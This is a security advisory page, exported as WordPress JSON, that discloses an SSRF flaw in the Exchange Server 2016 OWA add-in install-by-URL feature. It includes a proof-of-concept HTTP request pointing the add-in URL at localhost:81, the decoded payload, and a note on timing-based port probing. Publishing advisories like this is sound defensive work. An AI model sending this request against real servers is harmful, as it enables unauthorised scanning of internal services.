{"id":16723,"date":"2021-07-07T11:23:05","date_gmt":"2021-07-07T09:23:05","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2021-0021\/"},"modified":"2022-05-10T09:35:24","modified_gmt":"2022-05-10T07:35:24","slug":"usd-2021-0021","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0021\/","title":{"rendered":"usd-2021-0021"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2021-0021 | Microsoft Exchange Server OWA<\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2021-0021<\/span>
Affected Product<\/strong>: Microsoft Exchange Server\u00a0<\/span>
Affected Version<\/strong>: Latest (Exchange Server 2016, Version 15.1 (Build 2242.4))<\/span>
Vulnerability Type<\/strong>: CWE-918: Server-Side Request Forgery (SSRF)\u00a0<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: https:\/\/microsoft.com\u00a0<\/a><\/span>
Vendor Status<\/strong>: Not fixed \/ Disputed<\/span><\/p>\n

The following behavior was reported to Microsoft in May 2021. After finishing their investigations, Microsoft informed us that this issue does not meet their bar for servicing in a security update. However, they will be fixing it in a future version.<\/em><\/p>\n

<\/span><\/p>\n

Description<\/h3>\n

The application can be made to perform requests to other services. From the perspective of those other services it looks like the requests originated from the vulnerable application. By issuing such server-side requests, an attacker may be able to access services that are bound to the local interface of the vulnerable system and would therefore normally not be reachable over the network. In addition, an SSRF attack can provide access to the local network in which the server is located.<\/p>\n

The Exchange Server\u2019s OWA component allows to manage Add-Ins. In doing so, users may install Add-ins using multiple mechanisms, including installation by URL. The Exchange Server does not sufficiently validate the provided URL, resulting in SSRF to localhost.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The following request aims to add a new Add-In by URL:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]POST \/owa\/service.svc?action=NewApp\uff06EP=1\uff06ID=-111\uff06AC=1 HTTP\/1.1
\nHost: mail.example.com
\nConnection: close
\nContent-Length: 0
\nX-OWA-CANARY: dw6RrSW5xkeohY7IO6eScYBwLs2gC9kIomQo6IaQazVuNzOfEdnWOkdAizP_HzwRWj3HoqnG11A.
\nX-OWA-ActionId: -111
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.85 Safari\/537.36
\nclient-request-id: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
\nX-OWA-UrlPostData: %7B%22__type%22%3A%22NewAppDataRequest%3A%23Exchange%22%2C%22Header%22%3A%7B%22__type%22%3A%22JsonRequestHeaders%3A%23Exchange%22%2C%22RequestServerVersion%22%3A%22Exchange2013%22%2C%22TimeZoneContext%22%3A%7B%22__type%22%3A%22TimeZoneContext%3A%23Exchange%22%2C%22TimeZoneDefinition%22%3A%7B%22__type%22%3A%22TimeZoneDefinitionType%3A%23Exchange%22%2C%22Id%22%3A%22W.%20Europe%20Standard%20Time%22%7D%7D%7D%2C%22AppInfo%22%3A%7B%22__type%22%3A%22NewAppInfo%3A%23Exchange%22%2C%22DownloadOnly%22%3Atrue%2C%22Url%22%3A%22http%3A%2F%2Flocalhost%3A81%22%7D%7D
\nX-Requested-With: XMLHttpRequest
\nAction: NewApp
\nX-OWA-ActionName: NewAppAction
\nX-OWA-ClientBuildVersion: 15.1.2176.12
\nX-OWA-CorrelationId: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
\nContent-Type: application\/json; charset=UTF-8
\nX-OWA-ClientBegin: 2021-04-30T08:25:59.971
\nX-OWA-Attempt: 1
\nOrigin: https:\/\/mail.example.com
\nCookie: [REDACTED]
\n[...]<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

The X-OWA-UrlPostData<\/em> header could be decoded to the following:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]{\"__type\":\"NewAppDataRequest:#Exchange\",\"Header\":{\"__type\":\"JsonRequestHeaders:#Exchange\",\"RequestServerVersion\":\"Exchange2013\",\"TimeZoneContext\":{\"__type\":\"TimeZoneContext:#Exchange\",\"TimeZoneDefinition\":{\"__type\":\"TimeZoneDefinitionType:#Exchange\",\"Id\":\"W. Europe Standard Time\"}}},\"AppInfo\":{\"__type\":\"NewAppInfo:#Exchange\",\"DownloadOnly\":true,\"Url\":\"http:\/\/localhost:81\"}}<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n

By testing multiple ports at localhost as Url<\/em> parameter, clear timing differences can be observed:<\/p>\n

[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/poc-owa-ssrf-1.png\" title_text=\"poc-owa-ssrf-1\" _builder_version=\"4.16\" _module_preset=\"default\" custom_margin=\"27px||43px||false|false\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

\n
\n

Fix<\/h3>\n

It is recommended to evaluate the need to make server-side requests. If server-side requests are absolutely necessary, the corresponding function should be restricted by a whitelisting approach.<\/p>\n

<\/h3>\n

References<\/h3>\n